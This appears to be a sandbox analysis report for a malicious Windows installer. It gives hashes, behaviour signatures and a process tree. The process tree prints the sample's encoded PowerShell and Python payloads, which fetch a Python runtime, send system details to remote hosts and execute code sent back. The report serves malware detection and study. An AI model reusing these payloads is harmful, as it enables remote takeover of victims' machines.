c112347dac62d08b238413757fcc94b8ed5f64586cf177ac8d06011f2995aab9

Analysis

max time kernel
139s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2023, 19:32

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

instalador.msi
Size

1.1MB
MD5

bf5a65bb803890a434320e66966bbb27
SHA1

c1d80aca621a1378b073730918df535b82c552c1
SHA256

c112347dac62d08b238413757fcc94b8ed5f64586cf177ac8d06011f2995aab9
SHA512

3f4014f022acaa5c49fce8c80ed8bd51539c8889c9d23654bcdabecca85298418555187d0bbc4e1d16eaa41940f9c76677edc962bb6be233eda5eb73a6aa9d69
SSDEEP

24576:ekTYKztdfG8NQGafAdbe/IEFXsaV5C7eYVLsTPRDKe:ekTYefNQGoAhRaV5C77yPROe

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
22	4532	powershell.exe
24	4532	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4488	python.exe

Loads dropped DLL 10 IoCs

pid	Process
700	MsiExec.exe
700	MsiExec.exe
700	MsiExec.exe
700	MsiExec.exe
700	MsiExec.exe
4488	python.exe
4488	python.exe
4488	python.exe
4488	python.exe
4488	python.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI77E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI889.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI916.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIABD.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\e57fc80.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFDA9.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{E85CABC7-9ACF-4366-BA93-FF214599BEC2}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB3B.tmp	msiexec.exe
File created	C:\Windows\Installer\e57fc80.msi	msiexec.exe

Checks processor information in registry 2 TTPs 1 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	python.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2476	msiexec.exe
2476	msiexec.exe
2696	powershell.exe
2696	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3928	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3928	msiexec.exe
Token: SeSecurityPrivilege	2476	msiexec.exe
Token: SeCreateTokenPrivilege	3928	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3928	msiexec.exe
Token: SeLockMemoryPrivilege	3928	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3928	msiexec.exe
Token: SeMachineAccountPrivilege	3928	msiexec.exe
Token: SeTcbPrivilege	3928	msiexec.exe
Token: SeSecurityPrivilege	3928	msiexec.exe
Token: SeTakeOwnershipPrivilege	3928	msiexec.exe
Token: SeLoadDriverPrivilege	3928	msiexec.exe
Token: SeSystemProfilePrivilege	3928	msiexec.exe
Token: SeSystemtimePrivilege	3928	msiexec.exe
Token: SeProfSingleProcessPrivilege	3928	msiexec.exe
Token: SeIncBasePriorityPrivilege	3928	msiexec.exe
Token: SeCreatePagefilePrivilege	3928	msiexec.exe
Token: SeCreatePermanentPrivilege	3928	msiexec.exe
Token: SeBackupPrivilege	3928	msiexec.exe
Token: SeRestorePrivilege	3928	msiexec.exe
Token: SeShutdownPrivilege	3928	msiexec.exe
Token: SeDebugPrivilege	3928	msiexec.exe
Token: SeAuditPrivilege	3928	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3928	msiexec.exe
Token: SeChangeNotifyPrivilege	3928	msiexec.exe
Token: SeRemoteShutdownPrivilege	3928	msiexec.exe
Token: SeUndockPrivilege	3928	msiexec.exe
Token: SeSyncAgentPrivilege	3928	msiexec.exe
Token: SeEnableDelegationPrivilege	3928	msiexec.exe
Token: SeManageVolumePrivilege	3928	msiexec.exe
Token: SeImpersonatePrivilege	3928	msiexec.exe
Token: SeCreateGlobalPrivilege	3928	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3928	msiexec.exe
3928	msiexec.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 700	2476	msiexec.exe	88
PID 2476 wrote to memory of 700	2476	msiexec.exe	88
PID 2476 wrote to memory of 700	2476	msiexec.exe	88
PID 700 wrote to memory of 2696	700	MsiExec.exe	90
PID 700 wrote to memory of 2696	700	MsiExec.exe	90
PID 700 wrote to memory of 2696	700	MsiExec.exe	90
PID 2696 wrote to memory of 4532	2696	powershell.exe	96
PID 2696 wrote to memory of 4532	2696	powershell.exe	96
PID 2696 wrote to memory of 4532	2696	powershell.exe	96
PID 4532 wrote to memory of 388	4532	powershell.exe	98
PID 4532 wrote to memory of 388	4532	powershell.exe	98
PID 4532 wrote to memory of 388	4532	powershell.exe	98
PID 4532 wrote to memory of 4488	4532	powershell.exe	101
PID 4532 wrote to memory of 4488	4532	powershell.exe	101
PID 4532 wrote to memory of 4488	4532	powershell.exe	101

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\instalador.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3928

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8D29509B046EB243F274B713D93CE58D
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssB67.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjACAAQgBsAG8AYwBrACAAZgBvAHIAIABkAGUAYwBsAGEAcgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABwAGEAcgBhAG0AZQB0AGUAcgBzAC4ACgBQAGEAcgBhAG0AKAApAAoACgBjAGQAIAAkAEUATgBWADoAcAB1AGIAbABpAGMACgAkAEYAbwBsAGQAZQByACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3ACIACgAkAEYAbwBsAGQAZQByADIAIAA9ACAAIgAkAHsARQBOAFYAOgBwAHUAYgBsAGkAYwB9AFwAcAB5AHQAaABvAG4AIgAKAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABGAG8AbABkAGUAcgAyACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAIAB7AAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAHAAeQB0AGgAbwBuAGgAbwBzAHQAZQBkAC4AbwByAGcALwBwAGEAYwBrAGEAZwBlAHMALwA3ADgALwBjADUALwAzAGIAMwBjADYAMgAyADIAMwBmADcAMgBlADIAMwA2ADAANwAzADcAZgBkADIAYQA1ADcAYwAzADAAZQA1AGIAMgBhAGQAZQBjAGQAOAA1AGUANwAwADIANwA2ADgANwA5ADYAMAA5AGEANwA0ADAAMwAzADMANAAvAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3AC4AdABhAHIALgBnAHoAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGUAZgBpAGwAZQAuAHQAYQByAC4AZwB6AAoAIAAgACAAIAB0AGEAcgAgAC0AeAB2AHoAZgAgAHAAZQBmAGkAbABlAC4AdABhAHIALgBnAHoAOwAKACAAIAAgACAAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABGAG8AbABkAGUAcgAgACIAcAB5AHQAaABvAG4AIgAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIAAtAGMAIAAiACIAIgBpAG0AcABvAHIAdAAgAGIAYQBzAGUANgA0ADsAIABlAHgAZQBjACgAYgBhAHMAZQA2ADQALgBiADYANABkAGUAYwBvAGQAZQAoACcAYgBTAEEAOQBJAEMAYwB4AE4AVABVAHcATgBqAEEANABNAHoAWQA0AE0AVABZAG4AQwBtAGwAdABjAEcAOQB5AGQAQwBCAGkAWQBYAE4AbABOAGoAUQBnAFkAWABNAGcAWQBnAHAAcABiAFgAQgB2AGMAbgBRAGcAYwAyADkAagBhADIAVgAwAEkARwBGAHoASQBIAE4AegBDAG0AWgB5AGIAMgAwAGcAYwBtAEYAdQBaAEcAOQB0AEkARwBsAHQAYwBHADkAeQBkAEMAQgBqAGEARwA5AHAAWQAyAFUASwBhAFcAMQB3AGIAMwBKADAASQBIAGQAcABiAG4ASgBsAFoAeQBCAGgAYwB5AEIAMwBDAG0AUgBsAFoAaQBCAHcASwBHAE0AcwBJAEcANABwAE8AZwBvAGcASQBDAEEAZwBjAHoASQBnAFAAUwBCADMATABrADkAdwBaAFcANQBMAFoAWABrAG8AZAB5ADUASQBTADAAVgBaAFgAMAB4AFAAUQAwAEYATQBYADAAMQBCAFEAMABoAEoAVABrAFUAcwBJAEcATQBwAEMAaQBBAGcASQBDAEIAeQBaAFgAUgAxAGMAbQA0AGcAZAB5ADUAUgBkAFcAVgB5AGUAVgBaAGgAYgBIAFYAbABSAFgAZwBvAGMAegBJAHMASQBHADQAcABXAHoAQgBkAEMAbgBCAHkASQBEADAAZwBjAEMAaAB5AEoAMABoAEIAVQBrAFIAWABRAFYASgBGAFgARgB4AEUAUgBWAE4ARABVAGsAbABRAFYARQBsAFAAVABsAHgAYwBVADMAbAB6AGQARwBWAHQAWABGAHgARABaAFcANQAwAGMAbQBGAHMAVQBIAEoAdgBZADIAVgB6AGMAMgA5AHkAWABGAHcAdwBKAHkAdwBnAEoAMQBCAHkAYgAyAE4AbABjADMATgB2AGMAawA1AGgAYgBXAFYAVABkAEgASgBwAGIAbQBjAG4ASwBRAHAAMgBjAHkAQQA5AEkASABBAG8AYwBpAGQAVABUADAAWgBVAFYAMABGAFMAUgBWAHgAYwBUAFcAbABqAGMAbQA5AHoAYgAyAFoAMABYAEYAeABYAGEAVwA1AGsAYgAzAGQAegBJAEUANQBVAFgARgB4AEQAZABYAEoAeQBaAFcANQAwAFYAbQBWAHkAYwAyAGwAdgBiAGkAYwBzAEkAQwBkAFEAYwBtADkAawBkAFcATgAwAFQAbQBGAHQAWgBTAGMAcABDAG0AWgB6AEkARAAwAGcASgB5ADUAaQBjAG0ARgA2AGEAVwB4AHoAYgAzAFYAMABhAEMANQBqAGIARwA5ADEAWgBHAEYAdwBjAEMANQBoAGUAbgBWAHkAWgBTADUAagBiADIAMABuAEMAbQB4AHMASQBEADAAZwBXADIAWQBuAGEAbQBkAG8AYwAyAHQAawBPAFcAdABtAGUARABkADcAWgBuAE4AOQBKAHkAdwBnAFoAaQBkAHIAWgBqAFIAbQBhAGoAawB5AGUAbQBaAHIAYQBqAGsAeQBlADIAWgB6AGYAUwBjAHMASQBHAFkAbgBaAG0AdABxAE8AVABrAHoAZQBXAFkAegBPAFQATQB6AGUAMgBaAHoAZgBTAGMAcwBJAEcAWQBuAFoAMgBjADAATwBUAGgAcQBhAEcAZwB5AGUARABrADAATQB6AFIANwBaAG4ATgA5AEoAeQB3AGcAWgBpAGQAbwBhAEQAVQA0AE0AegBrAHcATQBEAFIAcQBhAEgAdABtAGMAMwAwAG4ATABDAEIAbQBKADIAbABpAGMAegBFAHgAZQBHAHQAawBPAEQAawAwAE0AMwB0AG0AYwAzADAAbgBYAFEAcABsAFoAUwBBADkASQBFAFoAaABiAEgATgBsAEMAbgBkAG8AYQBXAHgAbABJAEYAUgB5AGQAVwBVADYAQwBpAEEAZwBJAEMAQgBwAFoAaQBBAG4AUQBuAEoAdgBZAFcAUgAzAFoAVwB4AHMASgB5AEIAcABiAGkAQgB3AGMAagBvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBCAGkAYwBtAFYAaABhAHcAbwBnAEkAQwBBAGcAWgBtADkAeQBJAEcAdwBnAGEAVwA0AGcAYgBHAHcANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBkAEgASgA1AE8AZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAMwBhAFgAUgBvAEkASABOAHoATABuAE4AdgBZADIAdABsAGQAQwBoAHoAYwB5ADUAQgBSAGwAOQBKAFQAawBWAFUATABDAEIAegBjAHkANQBUAFQAMABOAEwAWAAxAE4AVQBVAGsAVgBCAFQAUwBrAGcAWQBYAE0AZwBjAHoAbwBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgATQB1AFkAMgA5AHUAYgBtAFYAagBkAEMAZwBvAFoAaQBkADcAYgBIADAAbgBMAEMAQgBqAGEARwA5AHAAWQAyAFUAbwBXAHoATQA0AE0AagBFAHMASQBEAFEAMABNAFQAZwBzAEkARABVAHgATgB6AGcAcwBJAEQAawA1AE8ARABNAHMASQBEAGMAegBNAFQARQBzAEkARABnAHkATwBUAFEAcwBJAEQAWQB5AE4AegBNAHMASQBEAEkAeABNAFQAawBzAEkARABFAHcATQBUAGcAcwBJAEQARQAzAE0ARABGAGQASwBTAGsAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAegBMAG4ATgBsAGIAbQBRAG8AWgBpAGQAdwBlAFUATgB2AFoARwBVAGcATABTAEIANwBjADMATQB1AFoAMgBWADAAYQBHADkAegBkAEcANQBoAGIAVwBVAG8ASwBYADAAZwBmAEMAQgA3AGQAbgBOADkASQBIAHcAZwBlADMAQgB5AGYAUwBjAHUAWgBXADUAagBiADIAUgBsAEsAQwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAGsAZABDAEEAOQBJAEgATQB1AGMAbQBWAGoAZABpAGcAMgBOAFQAVQB6AE4AaQBrAHUAWgBHAFYAagBiADIAUgBsAEsAQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBWADQAWgBXAE0AbwBZAGkANQBpAE4AagBSAGsAWgBXAE4AdgBaAEcAVQBvAGMAMwBSAHkASwBHAFIAMABLAFMAawBwAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbQBOAHMAYgAzAE4AbABLAEMAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAVgBsAEkARAAwAGcAVgBIAEoAMQBaAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBZAG4ASgBsAFkAVwBzAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBCAGwAZQBHAE4AbABjAEgAUQA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAEIAaABjADMATQBLAEkAQwBBAGcASQBHAHgAcwBMAG0ARgB3AGMARwBWAHUAWgBDAGcAbgBZADIARgB0AFoAWABKAGgATABXAFYAdABjAEgASgBsAGMAMgBFAHUAWQBXAE4AagBaAFgATgB6AFkAMgBGAHQATABtADkAeQBaAHkAYwBwAEMAaQBBAGcASQBDAEIAcABaAGkAQgBsAFoAVABvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBCAGkAYwBtAFYAaABhAHcAPQA9ACcAKQApADsAIABlAHgAaQB0ACgAKQAiACIAIgA7AAoA
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4532
    - - C:\Windows\SysWOW64\tar.exe
        
        "C:\Windows\system32\tar.exe" -xvzf pefile.tar.gz
        5⤵
        
        PID:388
    - - C:\Users\Public\python\python.exe
        
        "C:\Users\Public\python\python.exe" -c "import base64; exec(base64.b64decode('bSA9ICcxNTUwNjA4MzY4MTYnCmltcG9ydCBiYXNlNjQgYXMgYgppbXBvcnQgc29ja2V0IGFzIHNzCmZyb20gcmFuZG9tIGltcG9ydCBjaG9pY2UKaW1wb3J0IHdpbnJlZyBhcyB3CmRlZiBwKGMsIG4pOgogICAgczIgPSB3Lk9wZW5LZXkody5IS0VZX0xPQ0FMX01BQ0hJTkUsIGMpCiAgICByZXR1cm4gdy5RdWVyeVZhbHVlRXgoczIsIG4pWzBdCnByID0gcChyJ0hBUkRXQVJFXFxERVNDUklQVElPTlxcU3lzdGVtXFxDZW50cmFsUHJvY2Vzc29yXFwwJywgJ1Byb2Nlc3Nvck5hbWVTdHJpbmcnKQp2cyA9IHAocidTT0ZUV0FSRVxcTWljcm9zb2Z0XFxXaW5kb3dzIE5UXFxDdXJyZW50VmVyc2lvbicsICdQcm9kdWN0TmFtZScpCmZzID0gJy5icmF6aWxzb3V0aC5jbG91ZGFwcC5henVyZS5jb20nCmxsID0gW2Ynamdoc2tkOWtmeDd7ZnN9JywgZidrZjRmajkyemZrajkye2ZzfScsIGYnZmtqOTkzeWYzOTMze2ZzfScsIGYnZ2c0OThqaGgyeDk0MzR7ZnN9JywgZidoaDU4MzkwMDRqaHtmc30nLCBmJ2liczExeGtkODk0M3tmc30nXQplZSA9IEZhbHNlCndoaWxlIFRydWU6CiAgICBpZiAnQnJvYWR3ZWxsJyBpbiBwcjoKICAgICAgICBicmVhawogICAgZm9yIGwgaW4gbGw6CiAgICAgICAgdHJ5OgogICAgICAgICAgICB3aXRoIHNzLnNvY2tldChzcy5BRl9JTkVULCBzcy5TT0NLX1NUUkVBTSkgYXMgczoKICAgICAgICAgICAgICAgIHMuY29ubmVjdCgoZid7bH0nLCBjaG9pY2UoWzM4MjEsIDQ0MTgsIDUxNzgsIDk5ODMsIDczMTEsIDgyOTQsIDYyNzMsIDIxMTksIDEwMTgsIDE3MDFdKSkpCiAgICAgICAgICAgICAgICBzLnNlbmQoZidweUNvZGUgLSB7c3MuZ2V0aG9zdG5hbWUoKX0gfCB7dnN9IHwge3ByfScuZW5jb2RlKCkpCiAgICAgICAgICAgICAgICBkdCA9IHMucmVjdig2NTUzNikuZGVjb2RlKCkKICAgICAgICAgICAgICAgIGV4ZWMoYi5iNjRkZWNvZGUoc3RyKGR0KSkpCiAgICAgICAgICAgICAgICBzLmNsb3NlKCkKICAgICAgICAgICAgICAgIGVlID0gVHJ1ZQogICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIHBhc3MKICAgIGxsLmFwcGVuZCgnY2FtZXJhLWVtcHJlc2EuYWNjZXNzY2FtLm9yZycpCiAgICBpZiBlZToKICAgICAgICBicmVhaw==')); exit()"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
93152b0379180134a1f294b6424deb28

SHA1
ef4dfdc2cf91bb52aa5003920d6267713ce51f99

SHA256
1f1eab427892d197f85e16c45f9de14236a05a95c6277b8e3d4c6873657d9151

SHA512
1b6050e3e5ab0989e35d6146e54d00beba4140c6416cc169b88bafc50aa4258e35c94c5fdfc7a8b6b093cfcb0a1118e0139bf04b1bcd710497f3d9574e10ef8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
b19430ff85d6bc47386d0372e7f3acb1

SHA1
45489fc76a20631d021c188a1ba1582d34f69e0f

SHA256
e7dd430e142d099e22af8da816f83e486b2e0d36bb85827795a91df5852f8018

SHA512
bcc74c7fd913c6e5f6260e44d63b65bbff501f93cd20869b70a8ad2059a16c41de9e8e0bfe2bba9db75401a8cf938ae8e70309920564b89ec79253e91c19d859

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI7f731.LOG

Filesize
20KB

MD5
36722e4355e7b2b27c2f98fb367ce9df

SHA1
f64934ecb57a510b345c270ab17c3b5d85637d6e

SHA256
47fe651bfcb80ddbc446dc207dc109041ec19723b10ad36d879faa9b7cd6621c

SHA512
00f88bd53ae2c0ddbb92be5b757a0c9e281bfb3fd5a2cc07bf2099975ce8d7b0df229a3737d2ec21ba7ef7dcc0ed8b1fb92bde2af753b05f6be21e5e9fbdaf07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2watcxer.pol.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pssB66.ps1

Filesize
11KB

MD5
b5abb8c9a6ef46e319c4e0f4286ac980

SHA1
a4e064142edd01010cc1fbb4c14135993ccc3783

SHA256
040ae46c5b2eebefd5b59a4951ef795ebf0fa2e9cc48cc929d1cbb75e5ec21f5

SHA512
6e985cee3737f8bb4bcedeeee3bacebc6bd92589cc338cc9479cc908aa283be4b8d48482791d79b61f0434c45d54434e5910ac2ec283c3325cf81f6f12f385b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\pssB67.ps1

Filesize
5KB

MD5
2664dbb87d49a9a511e91fa61eaa3272

SHA1
0badde507f0cf59724324fcb39a2b1f6bf25c6ed

SHA256
719250e87720692e3ba220dd01bebdbf19c04fcb6e05c1fcaf4534d4b42e1a73

SHA512
fb59b61482e53dcd956d7341242f755c105b948963bc63d987411022760651852ec538a17043bc6ea676d00df895f391325da6bd665c85dda9a4d4f520ccaf00

Download Submit
C:\Users\Public\pefile.tar.gz

Filesize
73KB

MD5
fa0eba7c91f4e696771ddbfacdca25e4

SHA1
74b4c668e643f7cb8beb8128f5485fe709bef142

SHA256
82e6114004b3d6911c77c3953e3838654b04511b8b66e8583db70c65998017dc

SHA512
56cbfff3e6ffd07262d8a999358f2ddf2f6df7fff96ee647f94c57e791b278c9f9863aac92d0416fc3f7f2221652f8000a25d5f8f3233684b6bcec106df72fb4

Download Submit
C:\Users\Public\python\VCRUNTIME140.dll

Filesize
74KB

MD5
b8ae902fe1909c0c725ba669074292e2

SHA1
46524eff65947cbef0e08f97c98a7b750d6077f3

SHA256
657ab198c4035ec4b6ff6cf863c2ec99962593547af41b772593715de2df459c

SHA512
4a70740da0d5cdbd6b3c3869bcf6141cb32c929cb73728bd2044dd16896a3a1cafa28b0714fadcdb265172b62fa113095d379f3a7c16a248e86c8f7f89ecd0f4

Download Submit
C:\Users\Public\python\_socket.pyd

Filesize
69KB

MD5
d17542c811495295f808e8f847507b5a

SHA1
517c9b89e2734046214e73253f8a127374298e1d

SHA256
99fe82a75841db47d0842b15f855dcd59b258c5faf2094396741f32468286211

SHA512
affa357a639f512d2cf93a7d9fbf35565bc55f587a02004b661a3d604c3bb5f4ba8c7d646c3364d9a682264899768bcfcc76071b4856d14afa4a85cafa03fda7

Download Submit
C:\Users\Public\python\_socket.pyd

Filesize
69KB

MD5
d17542c811495295f808e8f847507b5a

SHA1
517c9b89e2734046214e73253f8a127374298e1d

SHA256
99fe82a75841db47d0842b15f855dcd59b258c5faf2094396741f32468286211

SHA512
affa357a639f512d2cf93a7d9fbf35565bc55f587a02004b661a3d604c3bb5f4ba8c7d646c3364d9a682264899768bcfcc76071b4856d14afa4a85cafa03fda7

Download Submit
C:\Users\Public\python\python.exe

Filesize
96KB

MD5
5acd2c21e08a164bcb87ce78f1ad6bf4

SHA1
9643c9cfd7094c669cf8f61dc01af84659de452b

SHA256
0dd77d2e5c885bd9c9c9246ac79a01144555bdb5de84cbceba0a0f96d354cbf0

SHA512
